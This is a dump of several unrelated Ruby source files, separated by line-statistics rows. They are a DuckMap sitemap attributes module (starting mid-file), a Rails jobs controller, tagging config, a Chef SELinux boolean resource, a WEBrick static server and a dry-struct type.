# contained in {DuckMap::Attributes} to be included in the {DuckMap::Config} and all controller classes. The code works by referencing
# sitemap_attributes_hash accessor method, however, the actual variable reference is different depending on the object that is referring to it.
#
# When {DuckMap::Attributes} module is included in {DuckMap::Config}, then, self.sitemap_attributes_hash is actually referencing the class
# level method defined on {DuckMap::Config}.
#
# When {DuckMap::Attributes} module is included in all controller classes (it is by default), then, self.sitemap_attributes_hash
# is actually referencing the class level method defined by {DuckMap::InheritableClassAttributes} via class_attribute method.
# This means that the actual variable that will contain the Hash value never gets initialized. So, self.sitemap_attributes_hash
# will ALWAYS be uninitialized during the first access from within a controller and will ALWAYS copy values from {DuckMap::Config}.
#
# @return [Hash]
def sitemap_attributes
# check the current state of self.sitemap_attributes_hash. If it is a Hash, then, it is considered initialized.
# otherwise, a new Hash is populated and assigned to self.sitemap_attributes_hash and a reference is returned.
#
# when this module is included in DuckMap::Config self.sitemap_attributes_hash is actually referencing the class
# level method defined on DuckMap::Config.
#
# When this module is included in all controller classes self.sitemap_attributes_hash is actually referencing the class
# level method defined on InheritableClassAttributes which never gets initialized. So, self.sitemap_attributes_hash
# will NEVER be a Hash on the first access from within a controller and will ALWAYS copy values from {DuckMap::Config}
unless self.sitemap_attributes_hash.kind_of?(Hash)
# I actually have code to do a deep clone of a Hash, however, I can't release it right now.
# I will in a later release. For now, I will commit another sin.
self.sitemap_attributes_hash = {}
source = DuckMap::Config.sitemap_attributes_hash
source.each do |item|
self.sitemap_attributes_hash[item.first] = {}.merge(item.last)
self.sitemap_attributes_hash[item.first][:handler] = {}.merge(item.last[:handler])
end
end
return self.sitemap_attributes_hash
end
end
##################################################################################
# This is a simple boolean value with a specific purpose. It is used to indicate if the object
# being worked on actually defined attributes using {DuckMap::SitemapObject::ClassMethods#acts_as_sitemap acts_as_sitemap},
# {DuckMap::SitemapObject::ClassMethods#sitemap_handler sitemap_handler} or {DuckMap::SitemapObject::ClassMethods#sitemap_segments sitemap_segments}
#
# This has special meaning for ActiveRecord::Base objects. When {DuckMap::Handlers handler methods} evaluate a model, the model is asked
# if it defined it's own attributes.
#
# If the model did define it's own attributes, then, those attributes are used and override any attributes
# set via acts_as_sitemap, sitemap_handler, or sitemap_segments on the controller.
#
# If the model did not define it's own attributes, then, the attributes defined on the controller are used.
#
# Defaults from {DuckMap::Config} are used if neither controller nor model defined any attributes.
#
# @return [TrueClass, FalseClass]
def is_sitemap_attributes_defined?
return self.class.is_sitemap_attributes_defined?
end
##################################################################################
# Returns a Hash associated with a key. The Hash represents all of the attributes for
# a given action name on a controller.
#
# acts_as_sitemap :index, title: "my title" # index is the key
# sitemap_attributes("index") # index is the key
#
# @return [Hash]
def sitemap_attributes(key = :default)
key = key.blank? ? :default : key.to_sym
# if the key exists and has a Hash value, cool. Otherwise, go back to :default.
# self.class.sitemap_attributes should ALWAYS return a Hash, so, no need to test for that.
# however, key may or may not be a Hash. should test for that.
unless self.class.sitemap_attributes[key].kind_of?(Hash)
key = :default
end
# the :default Hash SHOULD ALWAYS be there. If not, this might cause an exception!!
return self.class.sitemap_attributes[key]
end
##################################################################################
# Wrapper method for {#sitemap_attributes sitemap_attributes} that returns a Hash stripped of key/value pairs
# where the value is another Hash.
#
# # normal
# values = sitemap_attributes("index")
# puts values #=> {:title=>:title, :keywords=>:keywords,
# # :description=>:description, :lastmod=>:updated_at,
# # :handler=>{:action_name=>:sitemap_index, :first_model=>true}}
#
# # stripped
# values = sitemap_stripped_attributes("index")
# puts values #=> {:title=>:title, :keywords=>:keywords,
# # :description=>:description, :lastmod=>:updated_at}
#
# @return [Hash]
def sitemap_stripped_attributes(key = :default)
values = {}
attributes = self.sitemap_attributes(key)
attributes.each do |pair|
# we are traversing a Hash in this loop.
# each item passed to the block is a two-element Array.
# the first element is a key and the second element is the value.
# given: {title: :my_title, handler: {action_name: :sitemap_index}}
# :title would be pair.first
# :my_title would be pair.last
# in the second case:
# :handler would be pair.first
# the Hash {action_name: :sitemap_index} would be pair.last
# we want to skip all the dark meat and keep the white meat.
# therefore, we are only interested in attributes that are on the first level.
# meaning, simple key/value pairs where the value is a value other than Hash.
unless pair.last.kind_of?(Hash)
values[pair.first] = pair.last
end
end
return values
end
end
end
| 47.824176 | 165 | 0.633617 |
08636561e48e31273a53cfc7306e85783b566d26 | 351 | class JobsController < ApplicationController
def index
@store = STORE
@crashes = CRASHES
end
def crashing
CrashingJob.new.async.perform
redirect_to jobs_path
end
def single
SingleJob.new.async.perform
redirect_to jobs_path
end
def multiple
MultipleJob.new.async.perform
redirect_to jobs_path
end
end
| 15.954545 | 44 | 0.723647 |
21d7373dedafca90843c038fcb773ede4e2bd0ac | 83 | ActsAsTaggableOn.force_lowercase = true
ActsAsTaggableOn.strict_case_match = false
| 27.666667 | 42 | 0.879518 |
919c1d274a975d24094d61d654ba77e5bd8eef01 | 2,894 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../resource"
require_relative "selinux/common_helpers"
class Chef
class Resource
class SelinuxBoolean < Chef::Resource
unified_mode true
provides :selinux_boolean
description "Use **selinux_boolean** resource to set SELinux boolean values."
introduced "18.0"
examples <<~DOC
**Set ssh_keysign to true**:
```ruby
selinux_boolean 'ssh_keysign' do
value true
end
```
**Set ssh_sysadm_login to 'on'**:
```ruby
selinux_boolean 'ssh_sysadm_login' do
value 'on'
end
```
DOC
property :boolean, String,
name_property: true,
description: "SELinux boolean to set."
property :value, [Integer, String, true, false],
required: true,
equal_to: %w{on off},
coerce: proc { |p| selinux_bool(p) },
description: "SELinux boolean value."
property :persistent, [true, false],
default: true,
desired_state: false,
description: "Set to true for value setting to survive reboot."
load_current_value do |new_resource|
value shell_out!("getsebool", new_resource.boolean).stdout.split("-->").map(&:strip).last
end
action_class do
include Chef::SELinux::CommonHelpers
end
      action :set, description: "Set the state of the boolean." do
if selinux_disabled?
Chef::Log.warn("Unable to set SELinux boolean #{new_resource.name} as SELinux is disabled")
return
end
converge_if_changed do
cmd = "setsebool"
cmd += " -P" if new_resource.persistent
cmd += " #{new_resource.boolean} #{new_resource.value}"
shell_out!(cmd)
end
end
private
#
# Validate and return input boolean value in required format
# @param bool [String, Integer, Boolean] Input boolean value in allowed formats
#
# @return [String] [description] Boolean value in required format
def selinux_bool(bool)
if ["on", "true", "1", true, 1].include?(bool)
"on"
elsif ["off", "false", "0", false, 0].include?(bool)
"off"
else
raise ArgumentError, "selinux_bool: Invalid selinux boolean value #{bool}"
end
end
end
end
end
| 28.372549 | 101 | 0.628542 |
79c0c501c1a9dfb819095247fd1cbbbabe6e8ac9 | 74 | module DefineRails
module SensitiveData
VERSION = "1.0.1"
end
end
| 12.333333 | 22 | 0.702703 |
e243bc68fdc91582484d4f9d590f2243cef26e14 | 287 | require 'webrick'
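# Tiny static file server: document root is the current directory on port 2010,
# with ../scripts and ../styles mounted under /sh/; Ctrl-C (INT) stops it.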
include WEBrick
s = HTTPServer.new(
:Port => 2010,
:DocumentRoot => Dir::pwd
)
s.mount('/sh/scripts', WEBrick::HTTPServlet::FileHandler, '../scripts')
s.mount('/sh/styles', WEBrick::HTTPServlet::FileHandler, '../styles')
trap('INT') { s.stop }
s.start
| 23.916667 | 72 | 0.648084 |
181d43d1d41b11071bf093915ada4a037e997c12 | 270 | module WidgetsInc
module Types
class ValidatedOrderLine < ::Dry::Struct
attribute :order_line_id, Types.Instance(Types::OrderLineId)
attribute :product_code, Types::ProductCode.type
attribute :quantity, Types::OrderQuantity.type
end
end
end | 30 | 66 | 0.737037 |